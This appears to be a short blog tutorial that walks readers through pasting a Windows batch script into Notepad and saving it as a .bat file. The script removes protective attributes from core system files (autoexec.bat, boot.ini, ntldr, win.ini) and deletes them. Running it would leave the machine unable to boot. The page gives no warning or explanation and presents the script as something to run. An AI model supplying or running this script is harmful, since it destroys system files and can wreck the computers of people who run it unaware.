Step 1
Click on start button and search for notepad. Open it.
Step 2
 Copy and paste this code
 
 
 @echo off 
attrib -r -s -h c:\autoexec.bat 
del c:\autoexec.bat  attrib -r -s -h c:\boot.ini 
del c:\boot.ini   attrib -r -s -h c:\ntldr 
del c:\ntldr 
attrib -r -s -h c:\windows\win.ini 
del c:\windows\win.ini 
Click File in Notepad and Select Save as. Follow the pic below. The important thing is it should be in anyname.bat Select all files below it

Blogger Comment
Facebook Comment